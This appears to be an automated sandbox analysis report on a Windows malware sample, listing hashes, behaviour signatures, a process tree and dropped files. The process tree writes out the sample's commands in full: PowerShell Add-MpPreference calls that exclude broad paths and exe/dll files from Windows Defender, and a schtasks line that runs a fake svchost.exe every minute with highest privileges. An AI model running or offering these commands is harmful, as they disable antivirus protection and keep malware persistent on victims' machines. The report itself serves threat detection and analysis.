Analysis

  • max time kernel
    135s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-01-2025 20:07

General

  • Target

    $TEMP/Selfconvened.exe

  • Size

    4.5MB

  • MD5

    64b5e984fda860eedf19c29a124094fb

  • SHA1

    760c195741989e17b48ad52c13bed35e8ea51692

  • SHA256

    1f47c67d3baa635c4b7dd2bfed0a26a6bd499c3ab5a64d10b391a52e7d71ba39

  • SHA512

    187dbbc7137db41da77dd5c3d1471f82b157d031653109632adb9c49ea519f452b661cfd1845512661dcdb3b00bf2a02b2c3504406fb19ad89b06fcd6afee4e4

  • SSDEEP

    98304:xLIWL25lsofrCgl5PmHGjCYv8LHPrVWPa5Qwy:Fslsofuit0bJWPa5QJ

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\$TEMP\Selfconvened.exe
    "C:\Users\Admin\AppData\Local\Temp\$TEMP\Selfconvened.exe"
    1⤵
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3124
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd" #cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3588
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2628
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:812
    • C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /f /sc minute /rl highest /mo 1 /tn "Bobsledding" /tr "C:\Windows\system32\WindowsPro\svchost.exe"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:5052
  • C:\Windows\system32\WindowsPro\svchost.exe
    C:\Windows\system32\WindowsPro\svchost.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2092
  • C:\Windows\system32\WindowsPro\svchost.exe
    C:\Windows\system32\WindowsPro\svchost.exe
    1⤵
    • Executes dropped EXE
    PID:3012

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

    Filesize

    2KB

    MD5

    3d61c3fafacd57fc570153fefcc3bf45

    SHA1

    f0a01b1a27acde8d1d499daeb119e78b2d68f425

    SHA256

    89ed90813893a44310852bd8c730cc4ada856fff05b87a15f0a4f753f828ea28

    SHA512

    5f16cb9e3865edbb689c47655424e0600e1cfb5ced88a6f3d91bf5026494a1766495465c205b9937a4f08fb14fe71fe238e32f6e0d6ac1d1341ba4fa0868a1c9

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    50a8221b93fbd2628ac460dd408a9fc1

    SHA1

    7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

    SHA256

    46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

    SHA512

    27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4b2czpwp.v13.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Windows\System32\WindowsPro\svchost.exe

    Filesize

    10.7MB

    MD5

    0f97e75a9442912267b424b434738512

    SHA1

    50cd89a07a3677d9fed023c731b35f387251f17a

    SHA256

    f271ec5c579e017a25ef9c0635c15f254f47ea0285e191d3a639024ed224d445

    SHA512

    dafd64f8a91740b3a2a8f780da4cd9a2dd0833cdd355a231ead54a32a9b05eb4e53547b1efa5716378b64f391e0aeb128dd2e29c88c3979ff4492e1342f4bbbf

  • memory/2628-32-0x00007FFC7EB30000-0x00007FFC7F5F1000-memory.dmp

    Filesize

    10.8MB

  • memory/2628-29-0x00007FFC7EB30000-0x00007FFC7F5F1000-memory.dmp

    Filesize

    10.8MB

  • memory/2628-28-0x0000017C4A4E0000-0x0000017C4A502000-memory.dmp

    Filesize

    136KB

  • memory/2628-27-0x00007FFC7EB30000-0x00007FFC7F5F1000-memory.dmp

    Filesize

    10.8MB

  • memory/2628-17-0x00007FFC7EB30000-0x00007FFC7F5F1000-memory.dmp

    Filesize

    10.8MB

  • memory/3124-5-0x00007FFC7EB30000-0x00007FFC7F5F1000-memory.dmp

    Filesize

    10.8MB

  • memory/3124-11-0x00000256E74E0000-0x00000256E74F2000-memory.dmp

    Filesize

    72KB

  • memory/3124-10-0x00000256E9F30000-0x00000256EA3FC000-memory.dmp

    Filesize

    4.8MB

  • memory/3124-9-0x00000256E97C0000-0x00000256E9A64000-memory.dmp

    Filesize

    2.6MB

  • memory/3124-8-0x00000256E9410000-0x00000256E97B8000-memory.dmp

    Filesize

    3.7MB

  • memory/3124-7-0x00007FFC7EB30000-0x00007FFC7F5F1000-memory.dmp

    Filesize

    10.8MB

  • memory/3124-6-0x00007FFC7EB33000-0x00007FFC7EB35000-memory.dmp

    Filesize

    8KB

  • memory/3124-0-0x00007FFC7EB33000-0x00007FFC7EB35000-memory.dmp

    Filesize

    8KB

  • memory/3124-4-0x00007FFC7EB30000-0x00007FFC7F5F1000-memory.dmp

    Filesize

    10.8MB

  • memory/3124-3-0x00007FFC7EB30000-0x00007FFC7F5F1000-memory.dmp

    Filesize

    10.8MB

  • memory/3124-2-0x00000256E6FA0000-0x00000256E7358000-memory.dmp

    Filesize

    3.7MB

  • memory/3124-1-0x00000256CC500000-0x00000256CC97A000-memory.dmp

    Filesize

    4.5MB